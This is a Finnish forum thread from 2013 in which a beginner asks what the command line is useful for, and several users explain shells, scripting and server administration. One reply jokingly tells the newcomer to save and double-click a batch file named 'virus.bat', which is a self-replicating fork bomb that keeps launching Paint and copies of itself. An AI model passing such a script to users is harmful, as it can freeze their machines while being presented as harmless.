Kirjautuminen

Haku

Tehtävät

Keskustelu: Yleinen keskustelu: Mitä voin tehdä komentorivillä?

less_than_perfect [26.10.2013 23:40:03]

#

Olen tämän päivän aikana perehtynyt komentoriviin enkä vielä keksi vielä mitä voisin tehdä sillä. Tiedän että sillä voi etsiä tiedostoja ja ammattilaiset voivat tehdä taikojansa, mutta voinko minä ohjelmoinnin "opskelia" tehdä mitään hyödyllistä/järkevää.

Blaze [27.10.2013 00:18:30]

#

Ihan mitä vaan.

less_than_perfect [27.10.2013 01:57:43]

#

RE:Blaze -Voisitko vähän tarkentaa.

Metabolix [27.10.2013 02:16:40]

#

Komentorivi ei ole vain yksittäinen ohjelma, jolla tehtäisiin jotain tiettyä asiaa. Komentorivi on tietokoneen tekstipohjainen käyttöliittymä, jolla voi – ainakin periaatteessa – tehdä aivan samoja asioita kuin graafisellakin käyttöliittymällä. Linuxissa on ”aina” ollut tehokas komentotulkki. Windowsin perinteinen komentotulkki taas on aika rajoittunut ja vaivalloinen, mutta uusissa Windowseissa on lisäksi modernimpi PowerShell-komentotulkki.

Itse käytän tietokonetta lähes täysin komentorivin kautta. Tietenkin käytän graafisia ohjelmia niihin asioihin, joihin niitä erityisesti tarvitaan: selaimella surffaan, piirustusohjelmalla piirrän ja niin edelleen. Kuitenkin kaikki epämääräisempi ”tietokoneen käyttäminen” kuten asetusten muuttaminen, päivitysten asentaminen, tiedostojen selaus ja ohjelmien käynnistäminen tapahtuu komentorivillä.

Jokaisella komentotulkilla on myös oma ohjelmointikielensä, jolla voi yleensä tehdä esimerkiksi yksinkertaisia silmukoita ja vaikkapa suorittaa tietyn operaation usealle tiedostolle. Yhdessä erilaisten apuohjelmien kanssa komentorivillä voi siis vaikkapa muokata tehokkaasti useita kuva-, ääni- tai tekstitiedostoja samalla kertaa. Windowsissa näitä ohjelmia ei useinkaan ole, mutta Linuxissa moneenkin tarkoitukseen on myös komentorivillä toimiva ohjelma.

Komentorivillä voi siis todellakin tehdä vaikka mitä, joten epätarkkaan kysymykseesi on vaikea vastata mitään täsmällistä. Kuvittelepa, että joku tuttusi tulee kysymään, mitä tietokoneella voi tehdä, kun kuulemma sillä voi ainakin kirjoittaa tekstiä ja ammattilaiset voivat tehdä kaikenlaisia taikojansa. Osaisitko vastata selvästi ja tyhjentävästi?

Deffi [27.10.2013 08:43:29]

#

Tärkein asia minkä voit tehdä, on varmaankin komentotulkilla suoritettava "virus". Tallenna nimellä virus.bat työpöydälle ja tuplaklikkaa!

@echo off
:alku
echo All your base are belong to us
start mspaint
start virus.bat
goto alku

Jaska [27.10.2013 11:58:11]

#

Moniin servereihin ei ole asennettu graafista työpöytää. Näitä säädettäessä on varmasti nopeampaa käyttää komentoriviä kuin asentaa työpöytä ja konfiguroida asetukset siinä.

jukkah [28.10.2013 12:20:48]

#

Yleensä CLI on GUI:ta kätevämpi ongelmatilanteissa. CLI antaa virheilmoituksen, jonka voi copy-pastettaa Googleen ja bingo! GUI:ta käytettäessä ongelmana voi olla niinkin selvä kuin ”Mulla on tämmöinen tyhjä ruutu tässä. Pitäisikö siinä ehkä olla jotain?” tai jos virheilmoitus ylipäätään annetaan, sitä ei välttämättä pysty kopioimaan (kätevää).

Aika raaka yleistys kyllä, ohjelmastahan se on kiinni, tuleeko virheilmoitusta vai ei. Tosin CLI on sysadminia varten, jonka on tarkoitus ratkaista ongelma, ja GUI normikäyttäjää varten, jonka päätä ei kannata sekoittaa pitkillä virheilmoituksilla.

Sitten on vielä olemassa yksi todella eroa tekevä ominaisuus: silent mode. Yritäpä tehdä graafisella ohjelmalla jotain ilman, että se aukaisee ikkunan jos toisekin. Komentorivillä tämä on helppo nakki: copy from X to Y --overwrite --silent.

Vastaus

Aihe on jo aika vanha, joten et voi enää vastata siihen.

Tietoa sivustosta